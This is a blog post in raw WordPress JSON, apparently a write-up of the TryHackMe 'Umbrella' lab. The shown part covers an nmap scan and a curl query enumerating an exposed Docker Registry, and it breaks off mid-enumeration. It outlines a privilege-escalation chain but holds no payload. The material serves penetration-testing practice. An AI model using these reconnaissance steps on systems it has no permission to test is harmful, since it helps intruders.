{"id":103,"date":"2024-01-24T00:17:21","date_gmt":"2024-01-24T00:17:21","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=103"},"modified":"2024-04-16T20:55:33","modified_gmt":"2024-04-17T01:55:33","slug":"tryhackme-umbrella","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/","title":{"rendered":"TryHackMe: Umbrella"},"content":{"rendered":"<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"800\" data-attachment-id=\"104\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/umbrella\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?fit=800%2C800&amp;ssl=1\" data-orig-size=\"800,800\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"umbrella\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?fit=800%2C800&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=800%2C800&#038;ssl=1\" alt=\"\" class=\"wp-image-104\" style=\"width:189px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?w=800&amp;ssl=1 800w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=300%2C300&amp;ssl=1 300w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=150%2C150&amp;ssl=1 150w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=768%2C768&amp;ssl=1 768w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/figure>\n<\/div>\n\n\n<p><a href=\"https:\/\/tryhackme.com\/room\/umbrella\" target=\"_blank\" rel=\"noopener noreferrer nofollow\" title=\"Umbrella \">Umbrella <\/a>from TryHackMe is a Linux machine with multiple misconfigurations. To get a foothold, we need to perform enumeration on the Docker Registry and obtain credentials for the MySQL database. By accessing the DB, we can get usernames and passwords for multiple users to log in to a webpage and connect to SSH. To get root access we will abuse a mounted directory in a Docker container which is also accessible by a low-privileged user.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">NMAP<\/mark><\/h2>\n\n\n\n<p>We will begin with NMAP to find the open ports on the machine. 
Our NMAP scan shows the following ports are open:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>22 <strong>SSH<\/strong><\/li>\n\n\n\n<li>3306 <strong>MySQL<\/strong><\/li>\n\n\n\n<li>5000 <strong>Docker Registry<\/strong><\/li>\n\n\n\n<li>8080 <strong>HTTP<\/strong><\/li>\n<\/ul>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Umbrella]\n\u2514\u2500$ nmap -p22,3306,5000,8080 10.10.166.146 -A -oN nmap\/umbrella-full\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-01-20 14:49 CST\nNmap scan report for 10.10.166.146\nHost is up (0.20s latency).\n\nPORT     STATE SERVICE VERSION\n22\/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 f0:14:2f:d6:f6:76:8c:58:9a:8e:84:6a:b1:fb:b9:9f (RSA)\n|   256 8a:52:f1:d6:ea:6d:18:b2:6f:26:ca:89:87:c9:49:6d (ECDSA)\n|_  256 4b:0d:62:2a:79:5c:a0:7b:c4:f4:6c:76:3c:22:7f:f9 (ED25519)\n3306\/tcp open  mysql   MySQL 5.7.40\n| mysql-info: \n|   Protocol: 10\n|   Version: 5.7.40\n|   Thread ID: 7\n|   
Capabilities flags: 65535\n|   Some Capabilities: SupportsCompression, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, FoundRows, DontAllowDatabaseTableColumn, IgnoreSigpipes, SwitchToSSLAfterHandshake, InteractiveClient, LongColumnFlag, Speaks41ProtocolNew, LongPassword, ConnectWithDatabase, Speaks41ProtocolOld, SupportsTransactions, ODBCClient, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins\n|   Status: Autocommit\n|   Salt: \\x02Ev}J1\\x1E}#\\x02!M\\x0FC\\EA1tb\n|_  Auth Plugin Name: mysql_native_password\n| ssl-cert: Subject: commonName=MySQL_Server_5.7.40_Auto_Generated_Server_Certificate\n| Not valid before: 2022-12-22T10:04:49\n|_Not valid after:  2032-12-19T10:04:49\n|_ssl-date: TLS randomness does not represent time\n5000\/tcp open  http    Docker Registry (API: 2.0)\n|_http-title: Site doesn't have a title.\n8080\/tcp open  http    Node.js (Express middleware)\n|_http-title: Login\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: 
#89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Linux-Boxes\/Umbrella<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p22,3306,5000,8080<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.166.146<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-A<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-oN<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap\/umbrella-full<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Starting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7.94<\/span><span style=\"color: #C3E88D\">SVN<\/span><span style=\"color: #BABED8\"> ( <\/span><span style=\"color: #C3E88D\">https:\/\/nmap.org<\/span><span style=\"color: #BABED8\"> ) at 2024-01-20 14:49 CST<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">scan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">report<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.166.146<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Host<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">up<\/span><span style=\"color: #BABED8\"> (0.20s <\/span><span style=\"color: 
#C3E88D\">latency<\/span><span style=\"color: #BABED8\">).<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">PORT<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">STATE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SERVICE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">VERSION<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">22\/tcp<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">ssh<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">OpenSSH<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">8.2<\/span><span style=\"color: #C3E88D\">p1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Ubuntu<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #C3E88D\">ubuntu0.5<\/span><span style=\"color: #BABED8\"> (Ubuntu <\/span><span style=\"color: #C3E88D\">Linux<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">protocol<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssh-hostkey:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">3072<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">f0:14:2f:d6:f6:76:8c:58:9a:8e:84:6a:b1:fb:b9:9f<\/span><span style=\"color: #BABED8\"> (RSA)<\/span><\/span>\n<span 
class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">8<\/span><span style=\"color: #C3E88D\">a:52:f1:d6:ea:6d:18:b2:6f:26:ca:89:87:c9:49:6d<\/span><span style=\"color: #BABED8\"> (ECDSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #C3E88D\">b:0d:62:2a:79:5c:a0:7b:c4:f4:6c:76:3c:22:7f:f9<\/span><span style=\"color: #BABED8\"> (ED25519)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">3306\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">mysql<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">MySQL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">5.7<\/span><span style=\"color: #C3E88D\">.40<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">mysql-info:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Protocol:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Version:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">5.7<\/span><span style=\"color: #C3E88D\">.40<\/span><\/span>\n<span class=\"line\"><span style=\"color: 
#89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Thread<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ID:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Capabilities<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">flags:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">65535<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Some<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Capabilities:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsCompression,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Support41Auth,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IgnoreSpaceBeforeParenthesis,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsLoadDataLocal,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">FoundRows,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DontAllowDatabaseTableColumn,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IgnoreSigpipes,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SwitchToSSLAfterHandshake,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">InteractiveClient,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LongColumnFlag,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Speaks41ProtocolNew,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">LongPassword,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ConnectWithDatabase,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Speaks41ProtocolOld,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsTransactions,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ODBCClient,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsMultipleResults,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsMultipleStatments,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">SupportsAuthPlugins<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Status:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Autocommit<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Salt:<\/span><span style=\"color: #BABED8\"> \\x<\/span><span style=\"color: #C3E88D\">02Ev}J1<\/span><span style=\"color: #BABED8\">\\x<\/span><span style=\"color: #C3E88D\">1E}#<\/span><span style=\"color: #BABED8\">\\x<\/span><span style=\"color: #C3E88D\">02!M<\/span><span style=\"color: #BABED8\">\\x<\/span><span style=\"color: #C3E88D\">0FC<\/span><span style=\"color: #BABED8\">\\E<\/span><span style=\"color: #C3E88D\">A1tb<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Auth<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Plugin<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">mysql_native_password<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssl-cert:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Subject:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">commonName=MySQL_Server_5.7.40_Auto_Generated_Server_Certificate<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">before:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2022<\/span><span style=\"color: #C3E88D\">-12-22T10:04:49<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">after:<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2032<\/span><span style=\"color: #C3E88D\">-12-19T10:04:49<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_ssl-date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">TLS<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">randomness<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">does<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">represent<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">time<\/span><\/span>\n<span class=\"line\"><span style=\"color: 
#FFCB6B\">5000\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">http<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">Docker<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Registry<\/span><span style=\"color: #BABED8\"> (API: <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-title:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Site<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">doesn<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">t have a title.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">8080\/tcp open  http    Node.js (Express middleware)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">|_http-title: Login<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">Service Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:31px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We do not have credentials for SSH, MySQL, or the web login on Port 8080. 
We will begin by enumerating port 5000, which is the default port for a Docker Registry.<\/p>\n\n\n\n<p><a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/5000-pentesting-docker-registry\" target=\"_blank\" rel=\"noreferrer noopener\">HackTricks <\/a>has a blog post on pentesting Docker Registry, and it helped to get a foothold on the machine.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Enumeration<\/mark><\/h2>\n\n\n\n<p>A Docker registry may be configured to use <strong>HTTP<\/strong> or <strong>HTTPS<\/strong>, so the first thing you may need to do is <strong>find which one<\/strong> is in use:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#292D3E\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"curl -s http:\/\/10.10.10.10:5000\/v2\/_catalog\n#If HTTPS\nWarning: Binary output can mess up your terminal. 
Use &quot;--output -&quot; to tell \nWarning: curl to output it to your terminal anyway, or consider &quot;--output \nWarning: &lt;FILE&gt;&quot; to save to a file.\n\n#If HTTP\n{&quot;repositories&quot;:[&quot;alpine&quot;,&quot;ubuntu&quot;]}\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-palenight\" style=\"background-color: #292D3E\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">curl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-s<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">http:\/\/10.10.10.10:5000\/v2\/_catalog<\/span><\/span>\n<span class=\"line\"><span style=\"color: #676E95; font-style: italic\">#If HTTPS<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Warning:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Binary<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">output<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">can<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mess<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">up<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">your<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">terminal.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Use<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">--output -<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">tell<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Warning:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">curl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">output<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">it<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">your<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">terminal<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">anyway,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">or<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">consider<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">--output <\/span><\/span>\n<span class=\"line\"><span style=\"color: #C3E88D\">Warning: &lt;FILE&gt;<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">save<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">a<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">file.<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #676E95; font-style: italic\">#If HTTP<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">{<\/span><span style=\"color: #FFCB6B\">&quot;repositories&quot;<\/span><span style=\"color: #82AAFF\">:<\/span><span style=\"color: #BABED8\">[<\/span><span style=\"color: #FFCB6B\">&quot;alpine&quot;<\/span><span style=\"color: #FFCB6B\">,<\/span><span style=\"color: #FFCB6B\">&quot;ubuntu&quot;<\/span><span style=\"color: #FFCB6B\">]}<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:43px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>In this case, we did not get any errors which confirms that it is running <strong>HTTP <\/strong>and not<strong> HTTPS<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"78\" data-attachment-id=\"109\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/2-image\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/2.-image.png?fit=1396%2C106&amp;ssl=1\" data-orig-size=\"1396,106\" data-comments-opened=\"1\" 